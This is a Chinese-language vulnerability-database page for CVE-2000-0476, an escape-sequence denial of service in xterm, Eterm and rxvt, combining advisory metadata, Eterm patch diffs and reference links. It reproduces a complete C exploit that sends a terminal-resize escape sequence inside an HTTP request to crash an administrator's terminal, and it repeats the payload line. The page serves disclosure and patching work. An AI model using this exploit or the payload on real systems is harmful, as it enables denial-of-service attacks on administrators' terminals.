CVE-2000-0476
CVSS5.0
发布时间 :2000-06-01 00:00:00
修订时间 :2008-09-10 15:04:44
NMCOES    

[原文]xterm, Eterm, and rxvt allow an attacker to cause a denial of service by embedding certain escape characters which force the window to be resized.


[CNNVD]多个供应商xterm(及衍生产品)拒绝服务漏洞(CNNVD-200006-004)

        xterm, Eterm和rxvt存在漏洞。攻击者通过嵌入迫使窗口调整大小的转义字符导致拒绝服务漏洞。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:xfree86_project:x11r6:3.3.3
cpe:/a:xfree86_project:x11r6:4.0
cpe:/a:putty:putty:0.48
cpe:/a:michael_jennings:eterm:0.8.10
cpe:/a:rxvt:rxvt:2.6.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0476
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0476
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200006-004
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1298
(VENDOR_ADVISORY)  BID  1298
http://archives.neohapsis.com/archives/bugtraq/2000-05/0409.html
(VENDOR_ADVISORY)  BUGTRAQ  20000601 [rootshell.com] Xterm DoS Attack
http://archives.neohapsis.com/archives/bugtraq/2000-05/0420.html
(UNKNOWN)  BUGTRAQ  20000601 [rootshell.com] Xterm DoS Attack

- 漏洞信息

多个供应商xterm(及衍生产品)拒绝服务漏洞
中危 其他
2000-06-01 00:00:00 2005-10-20 00:00:00
远程  
        xterm, Eterm和rxvt存在漏洞。攻击者通过嵌入迫使窗口调整大小的转义字符导致拒绝服务漏洞。

- 公告与补丁

        Michael Jennings released the following patches for Eterm:
        Index: src/command.c
        ===================================================================
        RCS file: /cvs/enlightenment/Eterm/src/command.c,v
        retrieving revision 1.1.1.1.2.7
        diff -u -r1.1.1.1.2.7 command.c
        --- src/command.c 1999/11/02 16:34:35 1.1.1.1.2.7
        +++ src/command.c 2000/06/02 02:06:56
        @@ -4694,6 +4694,9 @@
         return; /* Make sure there are 2 args left */
         y = args[++i];
         x = args[++i];
        + if (x > scr->width || y > scr->height) {
        + return;
        + }
         XResizeWindow(Xdisplay, TermWin.parent, x, y);
         break;
         case 5:
        @@ -4713,6 +4716,9 @@
         return; /* Make sure there are 2 args left */
         y = args[++i];
         x = args[++i];
        + if (x > (scr->width / TermWin.fwidth) || y > (scr->height / TermWin.fheight)) {
        + return;
        + }
         XResizeWindow(Xdisplay, TermWin.parent,
         Width2Pixel(x) + 2 * TermWin.internalBorder + (scrollbar_visible()? scrollbar_total_width() : 0),
         Height2Pixel(y) + 2 * TermWin.internalBorder + (menubar_visible()? menuBar_TotalHeight() : 0));
        --RpDyejMaDGJhP2PU
        Content-Type: text/plain; charset=us-ascii
        Content-Disposition: attachment; filename="Eterm-0.9-DoS.patch"
        Index: src/term.c
        ===================================================================
        RCS file: /cvs/enlightenment/Eterm/src/term.c,v
        retrieving revision 1.33
        diff -u -r1.33 term.c
        --- src/term.c 2000/01/17 21:29:27 1.33
        +++ src/term.c 2000/06/02 02:06:44
        @@ -1232,6 +1232,8 @@
         return; /* Make sure there are 2 args left */
         y = args[++i];
         x = args[++i];
        + UPPER_BOUND(y, scr->height);
        + UPPER_BOUND(x, scr->width);
         XResizeWindow(Xdisplay, TermWin.parent, x, y);
         #ifdef USE_XIM
         xim_set_status_position();
        @@ -1254,6 +1256,8 @@
         return; /* Make sure there are 2 args left */
         y = args[++i];
         x = args[++i];
        + UPPER_BOUND(y, scr->height / TermWin.fheight);
        + UPPER_BOUND(x, scr->width / TermWin.fwidth);
         XResizeWindow(Xdisplay, TermWin.parent,
         Width2Pixel(x) + 2 * TermWin.internalBorder + (scrollbar_is_visible()? scrollbar_trough_width() : 0),
         Height2Pixel(y) + 2 * TermWin.internalBorder);
        --RpDyejMaDGJhP2PU--
        Simon Tatham PuTTY 0.48
        

- 漏洞信息 (19984)

Eterm 0.8.10,rxvt 2.6.1,PuTTY 0.48,X11R6 3.3.3/4.0 Denial of Service (EDBID:19984)
multiple dos
2000-05-31 Verified
0 Kit Knox
N/A [点击下载]
source: http://www.securityfocus.com/bid/1298/info

xterm is a popular X11-based terminal emulator. If VT control-characters are displayed in the xterm, they can be interpreted and used to cause a denial of service attack against the client (and even the host running the client). What makes it possible for remote users to exploit this vulnerability is a situation like this:

An admin is tailing the http access log

Attacker requests url with control characters in it

Admin's xterm crashes

This vulnerability also affects applications (such as other terminal emulators) derived from xterm code.

/*
 *
 * xterm Denial of Service Attack
 * (C) 2000 Kit Knox <kit@rootshell.com> - 5/31/2000
 *
 * Tested against: xterm (XFree86 3.3.3.1b(88b)  -- crashes
 *                 rxvt v2.6.1 -- consumes all available memory and then
 *                                crashes.
 *
 * Not vulnerable: KDE konsole 0.9.11
 *                 Secure CRT 3.0.x
 *
 *
 * By sending the VT control characters to resize a window it is possible
 * to cause an xterm to crash and in some cases consume all available
 * memory.
 *
 * This itself isn't much of a problem, except that remote users can inject
 * these control characters into your xterm numerous ways including :
 *
 * o Directories and filenames on a rogue FTP servers.
 * o Rogue banner messages on ftp, telnet, mud daemons.
 * o Log files (spoofed syslog messages, web server logs, ftp server logs)
 *
 * This sample exploit injects these control characters into a web get
 * request.  If an admin were to cat this log file, or happened to be doing
 * a "tail -f access_log" at the time of attack they would find their
 * xterm crash.
 *
 * Embedding "ESCAPE[4;65535;65535t" (where escape is the escape character)
 * inside files, directories, etc will have the same effect as this code.
 *
 */

#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

int sock;

int
main (int argc, char *argv[])
{
  struct hostent *he;
  struct sockaddr_in sa;
  char buf[1024];
  char packet[1024];
  int i;

  fprintf(stderr, "[ http://www.rootshell.com/ ] - xterm DoS attack - 05/31/2000.\n\n");
  if (argc != 2)
    {
      fprintf (stderr, "usage: %s <host/ip>\n", argv[0]);
      return (-1);
    }

  sock = socket (AF_INET, SOCK_STREAM, 0);
  sa.sin_family = AF_INET;
  sa.sin_port = htons (80);
  he = gethostbyname (argv[1]);
  if (!he)
    {
      if ((sa.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
	return (-1);
    }
  else
    {
      bcopy (he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
    }
  if (connect (sock, (struct sockaddr *) &sa, sizeof (sa)) < 0)
    {
      fprintf (stderr,
	       "Fatal Error: Can't connect to web server.\n");
      return (-1);
    }
  sprintf(packet, "GET /\033[4;65535;65535t HTTP/1.0\n\n");
  write (sock, packet, strlen(packet));
  close (sock);
  fprintf(stderr, "Done.\n");
}


		

- 漏洞信息

83441
rxvt Embedded Escape Character Handling DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Unknown

- 漏洞描述

rxvtcontains a flaw that may allow a denial of service. The issue is triggered when a remote attacker is able to resize the terminal window via escape character sequences, which will cause a denial of service. This flaw will result in loss of availability for the xterm.

- 时间线

2000-06-02 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor xterm (and derivatives) Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 1298
Yes No
2000-06-01 12:00:00 2009-07-11 02:56:00
First posted to BugTraq by Kit Knox <kit@rootshell.com> on May 31, 2000.

- 受影响的程序版本

XFree86 X11R6 4.0
XFree86 X11R6 3.3.3
Simon Tatham PuTTY 0.48
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
rxvt rxvt 2.6.1
- Immunix Immunix OS 7.0 beta
- Immunix Immunix OS 7.0
- Immunix Immunix OS 6.2
Michael Jennings Eterm 0.8.10
VanDyke SecureCRT 3.0
Sun Solaris 8_sparc
Sun OpenWindows 3.0
+ Sun SunOS 4.1.1
Simon Tatham PuTTY 0.49
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
HP HP-UX 11.0 4

- 不受影响的程序版本

VanDyke SecureCRT 3.0
Sun Solaris 8_sparc
Sun OpenWindows 3.0
+ Sun SunOS 4.1.1
Simon Tatham PuTTY 0.49
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
HP HP-UX 11.0 4

- 漏洞讨论

xterm is a popular X11-based terminal emulator. If VT control-characters are displayed in the xterm, they can be interpreted and used to cause a denial of service attack against the client (and even the host running the client). What makes it possible for remote users to exploit this vulnerability is a situation like this:

An admin is tailing the http access log

Attacker requests url with control characters in it

Admin's xterm crashes

This vulnerability also affects applications (such as other terminal emulators) derived from xterm code.

- 漏洞利用

It was reported on BugTraq (June 4, 2000 by Sebastian Hans &lt;gone@graffiti.net&gt;) that substituting 65536 for 65535 may be necessary with some configurations: sprintf(packet, "GET /\033[4;65535;65535t HTTP/1.0\n\n");

- 解决方案

Michael Jennings released the following patches for Eterm:

Index: src/command.c
===================================================================
RCS file: /cvs/enlightenment/Eterm/src/command.c,v
retrieving revision 1.1.1.1.2.7
diff -u -r1.1.1.1.2.7 command.c
--- src/command.c 1999/11/02 16:34:35 1.1.1.1.2.7
+++ src/command.c 2000/06/02 02:06:56
@@ -4694,6 +4694,9 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ if (x > scr->width || y > scr->height) {
+ return;
+ }
XResizeWindow(Xdisplay, TermWin.parent, x, y);
break;
case 5:
@@ -4713,6 +4716,9 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ if (x > (scr->width / TermWin.fwidth) || y > (scr->height / TermWin.fheight)) {
+ return;
+ }
XResizeWindow(Xdisplay, TermWin.parent,
Width2Pixel(x) + 2 * TermWin.internalBorder + (scrollbar_visible()? scrollbar_total_width() : 0),
Height2Pixel(y) + 2 * TermWin.internalBorder + (menubar_visible()? menuBar_TotalHeight() : 0));

--RpDyejMaDGJhP2PU
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="Eterm-0.9-DoS.patch"

Index: src/term.c
===================================================================
RCS file: /cvs/enlightenment/Eterm/src/term.c,v
retrieving revision 1.33
diff -u -r1.33 term.c
--- src/term.c 2000/01/17 21:29:27 1.33
+++ src/term.c 2000/06/02 02:06:44
@@ -1232,6 +1232,8 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ UPPER_BOUND(y, scr->height);
+ UPPER_BOUND(x, scr->width);
XResizeWindow(Xdisplay, TermWin.parent, x, y);
#ifdef USE_XIM
xim_set_status_position();
@@ -1254,6 +1256,8 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ UPPER_BOUND(y, scr->height / TermWin.fheight);
+ UPPER_BOUND(x, scr->width / TermWin.fwidth);
XResizeWindow(Xdisplay, TermWin.parent,
Width2Pixel(x) + 2 * TermWin.internalBorder + (scrollbar_is_visible()? scrollbar_trough_width() : 0),
Height2Pixel(y) + 2 * TermWin.internalBorder);

--RpDyejMaDGJhP2PU--


Simon Tatham PuTTY 0.48

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站